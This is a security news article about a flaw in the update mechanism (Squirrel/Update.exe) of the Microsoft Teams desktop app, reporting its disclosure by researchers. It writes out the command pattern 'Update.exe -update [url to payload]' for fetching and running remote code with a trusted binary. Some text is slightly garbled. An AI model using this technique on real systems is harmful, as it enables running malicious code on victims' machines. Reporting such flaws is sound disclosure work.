Microsoft Teams allows downloading and executing malicious files

Current implementation of the update mechanism in the desktop application Microsoft Teams allows downloading to the system and executing arbitrary files.

Problem also affects the desktop software GitHub, WhatApp and UiPath, but allows only loading the payload.

Squirrel”, in its turn uses package manager NuGet to download necessary files.

As security researchers have discovered, using the update command in vulnerable applications, you can download and execute code in the context of the current user. The same goes for ‘squirrel.exe‘.

In the case with Microsoft commands, the payload is added to the application folder and executed automatically using the Update.exe -update [url to payload] or squirrel.exe -update [url to payload] commands.

Reegun Richard
Reegun Richard
These commands can be used with other arguments, including “download”, allowing to get a remote payload in the form of a NuGet package. The method also works for ‘squirrel.exe’, which is a part of the Microsoft Teams installation package.

Security researcher Reegun Richard notified Microsoft about the issue on June 4 this year. Currently, the desktop application for Microsoft Teams is still vulnerable, since patch will arrive only in future releases.

Prior to release of the patch, Richard promises not to disclose the details of the problem. However researcher from the RingZer0 Team under the nick Mr. Un1k0d3r also discovered the problem and published the details.

Mr. Un1k0d3r tweet
Mr. Un1k0d3r tweet


[Total: 0    Average: 0/5]
READ  Google announced adding two new functions in Chrome browser

About Trojan Killer

Carry Trojan Killer Portable on your memory stick. Be sure that you’re able to help your PC resist any cyber threats wherever you go.

Check Also

MageCart on the Heroku Cloud Platform

Researchers Found Several MageCart Web Skimmers On Heroku Cloud Platform

Researchers at Malwarebytes reported about finding several MageCart web skimmers on the Heroku cloud platform …

Android Spyware CallerSpy

CallerSpy spyware masks as an Android chat application

Trend Micro experts discovered the malware CallerSpy, which masks as an Android chat application and, …

Leave a Reply